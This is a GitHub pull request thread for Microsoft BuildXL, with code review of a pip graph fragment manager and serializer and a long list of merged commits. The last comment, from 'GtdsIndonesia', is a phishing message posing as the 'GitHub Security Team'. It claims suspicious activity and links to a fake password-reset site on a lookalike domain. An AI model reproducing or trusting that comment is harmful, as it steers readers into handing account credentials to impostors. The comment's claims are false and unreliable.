Pipgraphfragmentsminimal

ljcollins25 opened the pull request.

erickulcyk committed:
add pipgraphfragments tool

erickulcyk committed:
changes to domino to support pip graph fragments

erickulcyk committed:
fill in pipgraphfragments prototype

erickulcyk committed:
Performance optimizations for pip graph fragments

erickulcyk committed:
add comment

erickulcyk committed:
merged

erickulcyk committed:
Merge branch 'master' of https://github.com/Microsoft/BuildXL into pipgraphfragments

erickulcyk committed:
reading pip graph fragments now works from dsc files using a pip graph fragment manager

erickulcyk committed:
undo pip table shortcut, make some things internal that were changed to public, and fix some test stuff

erickulcyk committed:
revert changes that aren't needed for core functionality

ljcollins25 commented on Public/Src/FrontEnd/UnitTests/Script.Ast/Consumers/Office/AmbientTests.cs:
```diff
@@ -201,6 +201,7 @@ public void TestAmbientFileUses()
 const file = f`D:/path/to/a/file.txt`;
 const filePath = file.path;
 const fileContent = File.readAllText(f`file.txt`);
+const pipGraphFragment = File.readPipGraphFragment(""foo"", f`file.txt`, []);
```
>pipGraphFragment [](start = 6, length = 16)

Incomplete update to test.

ljcollins25 commented on Public/Src/FrontEnd/UnitTests/Libs/Prelude.IO.ts:
```diff
@@ -494,6 +494,11 @@ namespace File {
+    /**
+     * Read in a fragment of the graph as a binary file and all all pip from it to the pip graph.
+     */
+    export declare function readPipGraphFragment(name: string, file: SourceFile, dependencyNames: string[]): string;
```
>string [](start = 109, length = 6)

What does it return? Also, I think it should be in Transformer namespace, not File namespace

erickulcyk replied:
Added more detail in transformer version

---
In reply to: [288666141](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288666141) [](ancestors = 288666141)

ljcollins25 commented on Public/Src/FrontEnd/SdkTesting/Helper/TestRunner.cs:
```diff
@@ -195,7 +196,7 @@ public bool Run(string testFolder, string specFile, string fullIdentifier, strin
                                 },
                                 CollectionUtilities.EmptyArray<StringId>());
-                            if (!frontEndController.PopulateGraph(cache, graph, engineAbstraction, evaluationFilter, configuration, configuration.Startup))
+                            if (!frontEndController.PopulateGraph(cache, graph, pipGraphFragmentManager, engineAbstraction, evaluationFilter, configuration, configuration.Startup))
```
>pipGraphFragmentManager [](start = 80, length = 23)

I don't think this should be a separate argument.

erickulcyk replied:
done.

---
In reply to: [288666712](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288666712) [](ancestors = 288666712)

ljcollins25 commented on Public/Src/FrontEnd/Core/FrontEndHostController.cs:
```diff
@@ -166,7 +166,8 @@ internal void SetState(FrontEndEngineAbstraction engine, IPipGraph pipGraph, ICo
             FrontEndArtifactManager = CreateFrontEndArtifactManager();
             PipGraph = pipGraph;
-            
+            PipGraphFragmentManager = fragmentManager;
```
>fragmentManager [](start = 38, length = 15)

Fragment manager can just be created here rather than passing it in right?

erickulcyk replied:
I wasn't sure how to get the contexts needed to create it here.

---
In reply to: [288667119](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288667119) [](ancestors = 288667119)

erickulcyk replied:
done

---
In reply to: [288692182](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288692182) [](ancestors = 288692182,288667119)

ljcollins25 commented on Public/Src/Engine/Scheduler/Graph/PipGraphFragmentManager.cs:
```diff
@@ -0,0 +1,144 @@
+            throw new NotImplementedException();
+        }
+
+        private static bool ReadPipGraphFragment(LoggingContext loggingContext, PipExecutionContext context, IPipGraph pipGraphBuilder, PipGraphFragmentContext pipFragmentContext, AbsolutePath filePath)
```
>ReadPipGraphFragment [](start = 28, length = 20)

We probably should have a separate PipGraphFragmentSerializer to separate out handling of serialization. It can just handle both serialization and deserialization.

erickulcyk replied:
sure, located in this folder or somewhere else?

---
In reply to: [288667996](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288667996) [](ancestors = 288667996)

ljcollins25 replied:
In theory it could live next to RemapReader/Writer.

---
In reply to: [288691860](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288691860) [](ancestors = 288691860,288667996)

erickulcyk replied:
done.

---
In reply to: [289021657](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r289021657) [](ancestors = 289021657,288691860,288667996)

ljcollins25 commented on Public/Src/Engine/Dll/Engine.FrontEnd.cs:
```diff
@@ -46,6 +47,7 @@ public sealed partial class BuildXLEngine
 
             pipGraph = null;
             IPipGraphBuilder pipGraphBuilder = null;
+            IPipGraphFragmentManager pipGraphFragmentManager = null;
```
>pipGraphFragmentManager [](start = 37, length = 23)

Add this logic could be moved into the FrontEndController.

erickulcyk replied:
done.

---
In reply to: [288668490](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r288668490) [](ancestors = 288668490)

ljcollins25 commented:
>     public sealed class AmbientFile : AmbientBasePathQueries<FileArtifact>

Put logic in AmbientTransformer instead.

---
Refers to: Public/Src/FrontEnd/Script/Ambients/AmbientFile.cs:17 in bab6694. [](commit_id = bab6694892fd8a27fe18ec52b4956ffc0b4c553f, deletion_comment = False)

erickulcyk commented:
@erickulcyk is added to the review. #Closed

norahuang committed:
USN record header's size does not match valid USN_RECORD_V3 (#360)

narasamdya committed:
Temp cleaner disposal should wait until clean-paths thread joins (#385)

Temp cleaner disposal should wait until clean path thread joins.

The bug occurs due to the use of timeout in joining clean-paths thread. If joining timeouts, then the clean-paths thread still executes and tries to take an element from the blocking collection. However, the collection may get disposed by the thread disposing the temp cleaner. Taking an element from a disposed blocking collection throws an exception.

Commit:
New Internal LKG 0.1.0-20190526.1

Commit:
New Public LKG 0.1.0-20190526.1

erickulcyk committed:
move readpipgraphfragment to transformer instead of file

narasamdya committed:
Relocate Temp directory when running in VM (#382)

Recall that, for VM execution, we net share our enlistment drive. Then, in VM we net use that drive from the VM with the same drive letter. Suppose that the drive letter is D:. Accessing D:\f from VM means accessing D:\f in the host.

Some operations that pips perform (particularly, unit test pips) need to be done locally on VM's disk, for example, creating symlinks, junctions, setting ACLs, etc.

Let's say that the drive provided by the VM for sandboxed processes is T:. Suppose that the pip specified D:\out\object\Pip123\t_0 as its temp directory. Here, we simply create a directory symlink (junctions won't work) from D:\out\object\Pip123\t_0 to T:\tmp\Pip123\0. The directory T:\tmp\Pip123\0 may not exist yet; it's SandboxedProcessExecutor's responsibility for creating that target directory. Thus, any access in VM to D:\out\object\Pip123\t_0\f actually accessing file f locally at T:\tmp\Pip123\0\f.

Further, some of our tests create junctions, but creating junctions with D:\... won't work because junctions are evaluated locally. Fortunately, our tests query %TEMP% to get the temporary folder. Thus, we need to set %TEMP% to the redirected path.

This change set also includes updates to VmCommandProxy abstraction to adapt to the newly implemented API in VmCommandProxy.

erickulcyk committed:
moved to transformer

semihokur committed:
Added csv option for PipExecutionPerformanceAnalyzer (#384)

Commit:
New Internal LKG 0.1.0-20190529.2.3

Commit:
New Public LKG 0.1.0-20190529.2.3

erickulcyk committed:
Correctly compute priority by separating critical path priority from a given spec priority (#388)

When priority was first added, the computation was done incorrectly. There are two pieces to priority, the one specified in the spec file and the one computed by critical path. To compute the new values for these, the outgoing pips priority needs to be separated into the specified priority and the critical path priority. Each of these values in then maxed to find the largest priority that the pip should have.

ljcollins25 commented on Public/Src/Engine/Scheduler/Graph/PipGraphFragmentManager.cs:
```diff
@@ -0,0 +1,144 @@
+
+                    if (!added)
+                    {
+                        Logger.Log.FailedToAddFragmentPipToGraph(loggingContext);
```
>FailedToAddFragmentPipToGraph [](start = 35, length = 29)

This should include details about the fragment (i.e. path and name) and failing pip.

erickulcyk replied:
done.

---
In reply to: [289095947](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r289095947) [](ancestors = 289095947)

erickulcyk commented:
>     public sealed class AmbientFile : AmbientBasePathQueries<FileArtifact>

done

---
In reply to: [497020929](https://github.com/ljcollins25/BuildXL/pull/1#issuecomment-497020929) [](ancestors = 497020929)

---
Refers to: Public/Src/FrontEnd/Script/Ambients/AmbientFile.cs:17 in bab6694. [](commit_id = bab6694892fd8a27fe18ec52b4956ffc0b4c553f, deletion_comment = False)

erickulcyk committed:
split out manager into serializer

ljcollins25 commented on Public/Src/FrontEnd/UnitTests/Script.ErrorHandling/LintRules/TestEnforceAmbientAccessInConfig.cs:
```diff
@@ -29,6 +29,7 @@ public TestEnforceAmbientAccessInConfig(ITestOutputHelper output) : base(output)
         [InlineData("Context.hasMount(\"foo\")")]
         [InlineData("Context.getTemplate()")]
         [InlineData("Context.getBuildEngineDirectory(\"foo\")")]
+        [InlineData("File.readPipGraphFragment(\"foo\", f`package.dsc`, [])")]
```
>File [](start = 21, length = 4)

Transformer

erickulcyk replied:
Done

---
In reply to: [289154259](https://github.com/ljcollins25/BuildXL/pull/1#discussion_r289154259) [](ancestors = 289154259)

ljcollins25 commented on Public/Src/Engine/Scheduler/Graph/PipGraphFragmentManager.cs:
```diff
@@ -0,0 +1,152 @@
+    /// <summary>
+    /// Manager which controls adding pip fragments to the graph.
+    /// </summary>
+    public class PipGraphFragmentManager : IPipGraphFragmentManager
```
>PipGraphFragmentManager [](start = 17, length = 23)

Can this move to BuildXL.Pips.dll?

ljcollins25 commented:
>     public abstract partial class Logger

Undo changes to this file since it is in Scheduler.dll now.

---
Refers to: Public/Src/Engine/Dll/Tracing/Log.cs:30 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

ljcollins25 commented:
>     public enum LogEventId : ushort

Undo changes to this file since it is in Scheduler.dll now.

---
Refers to: Public/Src/Engine/Dll/Tracing/LogEventId.cs:12 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

ljcollins25 commented:
>     public sealed partial class BuildXLEngine

I think the changes in this file are no longer needed now that the pip graph fragment manager is in the FrontEndHostController.

---
Refers to: Public/Src/Engine/Dll/Engine.FrontEnd.cs:33 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

ljcollins25 commented:
> // !!!!!! DO NOT UPDATE THIS FILE EVER !!!!!! 

According to Danny, you shouldn't update this file. Instead, whoever is using these methods should import Sdk.Transformers module which has the full set of APIs.

---
Refers to: Public/Sdk/Public/Prelude/Prelude.OfficeBackCompatHacks.dsc:10 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

almiliMSFT committed:
Fix the printout of bxl command line arguments (#390)

When printed out, the extension of the entry assembly is adjusted as follows:

 - if the extension is .dll and we are running on Windows --> the extension is changed to .exe
 - if the extension is .dll and we are running on non-Windows --> the extension is dropped
 - else --> no adjustment needed

AB#1547983

semihokur committed:
Fix InvalidOperationException in PipQueue when cancellation is requested (#389)

anirudhsanthiar committed:
Move coverage file upload to a pip dependent on the qtest pip (#373)

* Move coverage file upload to a pip dependent on the qtest pip, so that even if the test is a cache hit, coverage files will be uploaded

* Minor

* Fix argument

* Address reviewer comments

* Minor

* Address reviewer comments

* Minor

* Fix path separator

* Update qtest version

* Address reviewer comments

Commit:
New Internal LKG 0.1.0-20190530.3

erickulcyk committed:
Show progress as fragments are added similar to evaluation progress

erickulcyk commented:
>     public sealed partial class BuildXLEngine

Done

---
In reply to: [497471476](https://github.com/ljcollins25/BuildXL/pull/1#issuecomment-497471476) [](ancestors = 497471476)

---
Refers to: Public/Src/Engine/Dll/Engine.FrontEnd.cs:33 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

erickulcyk commented:
>     public enum LogEventId : ushort

Done

---
In reply to: [497471037](https://github.com/ljcollins25/BuildXL/pull/1#issuecomment-497471037) [](ancestors = 497471037)

---
Refers to: Public/Src/Engine/Dll/Tracing/LogEventId.cs:12 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

erickulcyk commented:
>     public abstract partial class Logger

done

---
In reply to: [497470980](https://github.com/ljcollins25/BuildXL/pull/1#issuecomment-497470980) [](ancestors = 497470980)

---
Refers to: Public/Src/Engine/Dll/Tracing/Log.cs:30 in 0a18468. [](commit_id = 0a18468363cec339f9fc556404b5fa27ca82ee68, deletion_comment = False)

Commit:
New Public LKG 0.1.0-20190530.3

almiliMSFT committed:
Deploy runtime assemblies for native security DLLs (#393)

erickulcyk committed:
Add remapping for service pip dependencies

erickulcyk committed:
Merge branch 'master' of https://github.com/Microsoft/BuildXL into pipgraphfragmentsminimal

kewilli committed:
Retain distributed copy error messages (#396)

Commit:
New Internal LKG 0.1.0-20190531.4

semihokur committed:
Early worker release for distributed builds (#392)

Kr1sso committed:
[Unix] Temporarily fix file permissions on cache materialization (#395)

* Forcefully set file access modes when placing files from cache on Unix (depending on config)

kant committed:
Minor formatting in ReadMe.md (#399)

JuanCarlosGI committed:
Add BuildXL.Cache.VerticalStore to BuildXL.library.forCloudBuild.nupkg (#402)

narasamdya committed:
Flight consistent temp directory creation behind a flag (#398)

Changes that made temp directory creation consistent break customers. Here, we put it (hopefully temporarily) behind a flag

narasamdya committed:
Retry process if exits with Azure Watson 0xDEAD exit code (#401)

Process can nondeterministically exit with 0xDEAD exit code in CB. This is the exit code returned by Azure Watson dump after catching the process crash. The root cause of the crash is unknown, but the primary suspect is the way Detours handle NtClose. One needs to have a deep investigation on detoured NtClose.

This change is an attempt to improve reliability by retrying the process.

narasamdya committed:
Restore FILE_SHARE_DELETE in Detoured CreateFile/NtCreateFile (#404)

We need to add FILE_SHARE_DELETE to dwShareMode to leverage NTFS hardlinks to avoid copying cache content, i.e., we need to be able to delete one of many links to a file. Unfortunately, share-mode is aggregated only per file rather than per-link, so in order to keep unused links delete-able, we should ensure in-use links are delete-able as well. However, adding FILE_SHARE_DELETE may be unexpected, for example, some unit tests may test for sharing violation. Thus, we only add FILE_SHARE_DELETE if the file is untracked.

Commit:
New Internal LKG 0.1.0-20190531.4.2

norahuang committed:
Increase weight for heavy test (#407)

Commit:
New Public LKG 0.1.0-20190531.4.2

dannyvv committed:
Fix explorer by initialing global hashing algo (#410)

olkononenko committed:
Add some debugging info to Contracts in BitSet (#405)

It appears that GetIndexByPath(path) might return values bigger than PathTable.Count. Adding debugging info to the contracts to confirm that this is the case.
AB#1532584

Commit:
New Internal LKG 0.1.0-20190531.4.3

Commit:
New Public LKG 0.1.0-20190531.4.3

Kr1sso committed:
Increase process timeout period for sandboxed test cases (#409)

* Increase process timeout for sandboxed pips to mitigate test failures

almiliMSFT committed:
Deploy Sdk.Drop even for win-x64 target runtime (#413)

Kr1sso committed:
Slightly better kext error message for load/reload instruction (#406)

mpysson committed:
Don't log error when processes retry since retry could succeed (#414)

* Don't log error when processes retry since retry could succeed

* Tweak test exit code to fix test on macOS

dannyvv committed:
Remove unneded first chance exception on DotNetCoreApp3.0 (#416)

Commit:
New Internal LKG 0.1.0-20190604.5

Commit:
New Public LKG 0.1.0-20190604.5

dfederm committed:
Replace BuildPrediction code with the Microsoft.Build.Prediction package (#411)

narasamdya committed:
Dropped directories may be materialized lazily (#420)

There're 3 lines of code that require directories to drop to exist on disk before the drop method is called. We already have lazily materialized output directories. Thus, the existence requirement is no longer needed. In fact it's causing an error because when the output directories are lazily materialized, then those directories may not be on disk yet.

mpysson committed:
Add error logging validation to all Scheduler integration tests (#421)

Kr1sso committed:
Allow orchestrator re-run with agent re-use (#415)

* Allow orchestrator to update advertised agent keys in AzDevs API

kewilli committed:
Enable cache tests (#408)

* Enable cache tests

* Remove comments

* Fix validation of AbsolutePath and illegal path characters

* Add SkipDotNetCore to ignore DotNetCore differences

* Skip these tests on macOS too

* Skip "SkipDotNetCore" on macOS

* Missed an import

* BuildXLSdk isn't available to Mac PR Validation

* Qualifiers don't exist on Tests.osx

kewilli committed:
Cache GRPC channels (#391)

Cache GRPC channels

narasamdya committed:
Allow users to ask cache to replace file on materialization (#419)

Allow users to ask cache to replace file on materialization

Kr1sso committed:
Restore 10 min sandboxed process timeouts (#424)

dannyvv committed:
Deploy native bits with code that refers to it, not all final deployments (#423)

Commit:
New Internal LKG 0.1.0-20190605.9

Commit:
New Public LKG 0.1.0-20190605.9

Kr1sso committed:
Only allow orchestration task errors to flag orchestrated build as failures (#429)

dannyvv committed:
Pwsh does not fully respect /noprofile, untrack user crypto folders for powershell (#425)

norahuang committed:
Deal with relative paths in PATH (#427)

Commit:
New Internal LKG 0.1.0-20190607.1

norahuang committed:
Revert regression in QTest SDK's dependency specification (#430)

Commit:
New Internal LKG 0.1.0-20190607.4

Commit:
New Public LKG 0.1.0-20190607.4

Commit:
New Internal LKG 0.1.0-20190607.6

Commit:
New Public LKG 0.1.0-20190607.6

mpysson committed:
Remove errant Debugger.Launch() (#435)

almiliMSFT committed:
[.NET Core] Enable Server GC (#441)

Without this, the front end phases (from initializing resolvers to evaluating specs) are significantly slowed down in larger builds.

almiliMSFT committed:
Make sure that VS solution generator skips over netcoreapp processes (#428)

kewilli committed:
Extract ResourcePool from GrpcCopyClientCache (#437)

Extract ResourcePool from GrpcCopyClientCache

smera committed:
Use Out folder as the root of the MSBuild logs (#440)

narasamdya committed:
Translate host UNC drive path to allow journal tests in VM (#439)

This is one of three changes required for running journal tests in VM. In this change, we translate host UNC drive path that is often access by tools like dotnet.exe.

This change also include introduction of some special environment variables that the unit tests will use to work properly when run in VMs.

jbayardo committed:
Fix PutStream for non-seekable streams (#431)

jbayardo committed:
Improve ContentLocationDatabase performance (#403)

SergeyTeplyakov committed:
Allow secrets for old redis to be null. (#436)

SergeyTeplyakov committed:
Reset NagleQueue timer when the event processing is resumed. (#434)

* Reset NagleQueue timer when the event processing is resumed.

* Reset the timer in TriggerBatch.

SergeyTeplyakov committed:
Store sequence number only when all the messages are processed. (#433)

* Store sequence number only when all the messages are processed.

* Add sequence point per action block to avoid race condition.

norahuang committed:
Add args unsafe_GlobalPassthroughEnvVars and unsafe_GlobalUntrackedScopes (#442)

JuanCarlosGI committed:
Make CacheJsonDataConverter public (#455)

kzu committed:
Update link to VsoHash.cs to its current location (#454)

kewilli committed:
Remove unused copyfile logs (#447)

Remove unused copyfile logs

JuanCarlosGI committed:
Log hash age when evicting (#449)

* Add Age to EvictResult message

* typo

dannyvv committed:
Mark BuildXL executables 64-bit only rather than AnyCpu since all our native code which all our exe's depend on are 64-bit only.. (#448)

erickulcyk committed:
Order pip fingerprints when adding to json (#446)

Adding order independent items to the fingerprinter should actually sort them before adding them to the json text. To do this, a comparer is given for FileArtifacts, FileArtifactsWithAttributes, and DirectoryArtifacts. The actual pip fingerprinter ignores this comparer as it XORs the values together, but the json fingerprinters sorts the items before adding them.

Commit:
New Internal LKG 0.1.0-20190611.6

Commit:
New Public LKG 0.1.0-20190611.6

Commit:
New Internal LKG 0.1.0-20190612.6

kewilli committed:
Avoid counter overflow (#460)

Commit:
New Public LKG 0.1.0-20190612.6

smera committed:
Add a way to specify passthrough environment variables for the MSBuild resolver (#462)

SergeyTeplyakov committed:
Reference EventHub with 461 qualifier to deploy all its dependencies (#464)

norahuang committed:
Increase weight for frequently timeout tests (#450)

narasamdya committed:
Check path validity when adding directory ancestor to manifest (#466)

Contract exception occurs when adding directory ancestor to manifest.

Suppose that the shared opaque root is B:\ (due to subst), and the path in question is B:\file.txt. Because B:\ is within B:\ when calling AbsolutePath.IsWithin, the parent traversal continues and ends up in an invalid path.

SergeyTeplyakov committed:
Eager register recently removed locations. (#443)

* Eager register recently removed locations.

* Finish the change.

* Address CR comments.

anirudhsanthiar committed:
Add a way to pass environment variables into the qtest pip (#465)

* Add a way to pass environment variables into the qtest pip

* Account for the possibility that qTestEnvironmentVariables may be undefined

* Address reviewer comment

almiliMSFT committed:
[MacSandbox] track process name upon execve (#438)

olkononenko committed:
Always compile our bits with 'checked : true' (#432)

AB#1534271

smera committed:
Make sure that passthrough variables reach both graph creation and process execution for MSBuild resolver (#468)

olkononenko committed:
DeterminismProbe+ disables Incremental Scheduling (#463)

AB#1553973

Commit:
New Internal LKG 0.1.0-20190613.9

Commit:
New Public LKG 0.1.0-20190613.9

olkononenko committed:
Small optimization to pip fingerprinter (#471)

AB#1552787

Commit:
New Internal LKG 0.1.0-20190613.1

smera committed:
Increase surviving process timeout to 500ms for MSBuildResolver scheduled pips (#470)

Commit:
New Public LKG 0.1.0-20190613.1

jbayardo committed:
Improve CaSaaS use of Secret Store (#459)

kewilli committed:
Read next file chunk while waiting for GRPC response (#472)

Read next file chunk while waiting for GRPC response

JuanCarlosGI committed:
Log correct replica count and effectiveLastAccessTime in eviction (#456)

* Include replica count when returning info about a shash from MemoryContentDirectory

* Update replicaCount in LLS

* Fix minor issue

* Refactor and fix tests

* Remove extra space

* Remove unnecessary using statement

* Include EffectiveAge in log message

jbayardo committed:
Add ContentLocationDabase's in-memory cache configuration options (#474)

narasamdya committed:
Changes needed to run tests in VM (#457)

These changes are needed to run tests in VM.

One notable change is the way we check the ability to scan the journal. Normally, we check the root path of the executing assembly to know if journal scanning can be performed. However, in the VM scenario the executing assembly is on the host, and one cannot check journal capability of the host from VM.

Another less safe change is skipping file tracking if the root path is in a journal incapable volume. Our unit tests (particularly the integration tests) track the test executable (the one that execute Operations.cs). But that executable is located on the host, and tracking the host USN from VM does not work. Unfortunately, once tracking failed, the file change tracker switches into disabled state, and this failed all incremental scheduling tests.

Commit:
New Internal LKG 0.1.0-20190614.8

Commit:
New Public LKG 0.1.0-20190614.8

Commit:
New Internal LKG 0.1.0-20190615.0

mpysson committed:
Refactor TestProcess to not use PathTable to speed up tests (#422)

Refactor TestProcess to not use PathTable to speed up tests

Commit:
New Public LKG 0.1.0-20190615.0

shivanshu3 committed:
Add better support for opaque directories in DependencyAnalyzer (#475)

Add file members of output directories of pips to the output files list in DependencyAnalyzer.

dfederm committed:
Upgrade Microsoft.Build.Prediction to 0.2.0 (#480)

Upgrade Microsoft.Build.Prediction to 0.2.0

mpysson committed:
Reduce DScript AST conversion parallelism (#476)

SergeyTeplyakov committed:
Added required dependencies explicitely (#483)

Kr1sso committed:
Make signal handling resilient to asynchronous calls (#478)

* Make signal handling on Unix resilient to asynchronous calls

Kr1sso committed:
Enable additional DScript interpreter test for macOS (#477)

* Enabled SuperLongBinaryExpressionShouldNotLeadToStackoverflow test for macOS

dannyvv committed:
Reenable opaque directory upload from our deployment to drop (#482)

anirudhsanthiar committed:
Allow users to specify the source from which a qtest target is built. (#479)

* Allow users to specify the source from which a qtest target is built. This is essential for the correct operation of qtest's flaky test detection and reporting.

* Minor

* Address reviewer comment

SergeyTeplyakov committed:
Fix 'BuildXL.Cache.Tools' package (#484)

ljcollins25 committed:
Add an analyzer for analyzing required vs optional dependencies. (#444)

* Add an analyzer for analyzing required vs optional dependencies.

dannyvv committed:
[DScript] Improve Grpc/Protobuf codegen api (#486)

plade committed:
QTest: Add Recycle Bin to untracked directories (#485)

* QTest: Add Recycle Bin to untracked directories

* QTest: Add Recycle Bin to untracked directories
Add detailed explanation for untracking recycle bin

dcwuser committed:
Fix unix time and risk coefficient issues in distributed evictibility metric (#487)

Commit:
New Internal LKG 0.1.0-20190618.3

Commit:
New Public LKG 0.1.0-20190618.3

kewilli committed:
Pool GRPC buffers (#489)

Commit:
New Internal LKG 0.1.0-20190619.1

dannyvv committed:
Don't force full framework for detours tests (#493)

Commit:
New Public LKG 0.1.0-20190619.1

kewilli committed:
Try to upgrade to released packages from Artifacts (#496)

Upgrade to packages in Artifacts' Release view

Kr1sso committed:
Fix non-internal sandbox build change detection (#494)

* Fix source file dependencies for Apple binaries build phase to correctly build code changes when the sandbox is not running

dannyvv committed:
[DScript] Add ensureContents api to StaticDirectory (#501)

Commit:
New Internal LKG 0.1.0-20190621.1

Commit:
New Public LKG 0.1.0-20190621.1

almiliMSFT committed:
Increase default number of retries for IPC connections (#499)

Commit:
New Internal LKG 0.1.0-20190620.5

dannyvv committed:
[DScript] Update VC dependencies to use the whole tools folder (#505)

Commit:
New Internal LKG 0.1.0-20190621.1

dannyvv committed:
Thread through cancellationToken to more parralel constructs to improve Ctrl+C experience (#507)

Commit:
New Internal LKG 0.1.0-20190621.10

Commit:
New Public LKG 0.1.0-20190621.10

Commit:
New Internal LKG 0.1.0-20190622.1

Commit:
New Public LKG 0.1.0-20190622.1

Kr1sso committed:
Nuget full framework dependency spec generator changes (#502)

* Always include dependency closure for full framework packages and allow for compatibility between 4.6.1+ full framework packages and .NETStandard only specs.

erickulcyk committed:
Add copy file analyzer which prints out a list of all copy file pips (#511)

* Add copy file analyzer which prints out a list of all copy files

norahuang committed:
create a separate temp dir for code coverage upload pip (#504)

SergeyTeplyakov committed:
Reduce tracing (#506)

* Initial attempt to reduce Kusto traffic

* Trace short hashes.

* Remove ToShortString().

* Roll back one change

* Comment fix

SergeyTeplyakov committed:
Postpone content eviction until local server is fully initialized. (#500)

* Postpone content eviction until local server is fully initialized.

* Use PerformOperation for tracing

narasamdya committed:
Handle long paths in directory creation in BuildXL's cache layer (#513)

BuildXL's cache layer calls Directory.CreateDirectory to create directory without handling long paths. Fortunately, BuildXL's has FileUtilitites.CreateDirectory that, for most part, handles long paths.

This change switch Directory.CreateDirectory to FileUtilities.CreateDirectory, as well as, fix directory existence check in FileUtilities.CreateDirectory.

dannyvv committed:
Speed up loggen by adding a 'lite' version (#515)

erikmav committed:
Fix Detours process substitution logic (#490)

Fix Detours process substitution logic to handle no trailing quote properly

narasamdya committed:
Roll out VM build (#492)

These are changes to roll out selfhost builds in VM.

almiliMSFT committed:
ContentStoreApp: fix the Console.CancelKeyPressed handler (#509)

gRPC server also registers a CancelKeyPress handler, which is why we must:
  - register ours before initializing gRPC server (so that we get called first)
  - cancel the event once we handle it, so that gRPC's handler doesn't get called

If both handlers are invoked, then once we call _grpcServer.KillAsync() in response to this event, the gRPC server will have already shut down (because of its own response to this event) and so we calling KillAsync() again ends up instantly (and silently) killing the whole program (at least on .NET Core on Mac). This happens somewhere in native gRPC code, so everything looks like the program exited normally, when in fact the program exited inside of _grpcServer.KillAsync() and the rest of our cleanup code (e.g., Application.Dispose()) was never executed.

kewilli committed:
Use server GC on ContentStoreApp.exe (#514)

Use server GC on ContentStoreApp.exe

dannyvv committed:
Move instrumentation constants from utilities to instrumentation.common (#518)

kewilli committed:
Set buffer size on GRPC client (#520)

almiliMSFT committed:
[VS Extension] Switch to AsyncPackage and background autoload (#516)

* Switch to AsyncPackage and background autoload
* Bump up the version from 2.9 to 3.0

dannyvv committed:
Remove dependency for loggen on utilities in the lite version (#521)

ljcollins25 committed:
Don't reuse files for incremental checkpointing between epoch changes. (#517)

Commit:
New Internal LKG 0.1.0-20190625.5

kewilli committed:
Configure GZip barrier (#522)

Configure GZip barrier

almiliMSFT committed:
[ContentStoreApp] Gracefully handle SIGTERM (#523)

smera committed:
Make sure all accesses under shared opaques get reported (#525)

Make sure all accesses under shared opaques get reported under an unsafe flag

narasamdya committed:
Bump up VmCommandProxy for testing in cbtest (#524)

Commit:
New Public LKG 0.1.0-20190625.5

plade committed:
QTest: Add Debug option to run tests under Debug mode. (#526)

jbayardo committed:
Fix issue and add test (#529)

Commit:
New Internal LKG 0.1.0-20190626.4

Commit:
New Public LKG 0.1.0-20190626.4

dannyvv committed:
Use download resolver for electron bits rather than download with pwsh (#530)

erikmav committed:
Substitute process shim NRE fix and logging (#531)

Substitute process shim: Fix issue with null lpCommandLine, and add debug tracing

narasamdya committed:
Demote file open failure message to diagnostics (#532)

almiliMSFT committed:
Remote telemetry for ContentStoreApp (#503)

New classes:

 - CsvFileLog: an ILog class that writes log messages to a CSV file and formats them according to a given schema
 - KustoUploader: a class responsible for asynchronously receiving CSV files and ingesting them into a Kusto table

Commit:
New Internal LKG 0.1.0-20190627.8

mpysson committed:
Specify TestSourceDir for QTests (#497)

Commit:
New Public LKG 0.1.0-20190627.8

mpysson committed:
Refinements for error tracking in telemetry (#491)

* Classify distributed build network failures with higher precedence than all other infrastructural errors

* Plumb first error message head & tail into completion events to aid debugging internal errors

plade committed:
QTest: Enable Retrying QTest Pip for Internal Errrors (#535)

smera committed:
Fix flaky test ConsumerProducersCanOnlyReadFromProducersInSharedOpaqueWithSameRoot (#534)

Order pips to avoid a race

sahilmgandhi committed:
Allow absolute path and frontend to accept paths beyond root drive (#533)

AB#1557991

Allow the absolute paths for windows/unix to go past the root (ie C:/aaa/bbb/../../../../ should resolve to C:/). This is particularly useful for any Domino auto-generated paths during the build phase.

Furthermore, if the frontend passes in any paths that go beyond the root, we no longer throw a path invalid error, and merely return the root directory.

almiliMSFT committed:
Redirect Microsoft.IdentityModel.Clients.ActiveDirectory assembly binding for bxl.exe (#538)

Commit:
New Internal LKG 0.1.0-20190630.0

Commit:
New Public LKG 0.1.0-20190630.0

smera committed:
Ignore 'IsGraphBuild' property for computing pip name and log directory in MSBuild resolver (#537)

ljcollins25 committed:
Fix update of last processed sequence point in event store. (#539)

almiliMSFT committed:
Redirect Microsoft.IdentityModel.Clients.ActiveDirectory assembly binding for ContentStoreApp.exe (#540)

dcwuser committed:
Count all replicas toward effective age (#542)

erickulcyk committed:
merged

erickulcyk committed:
merge fixes

GtdsIndonesia commented:
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
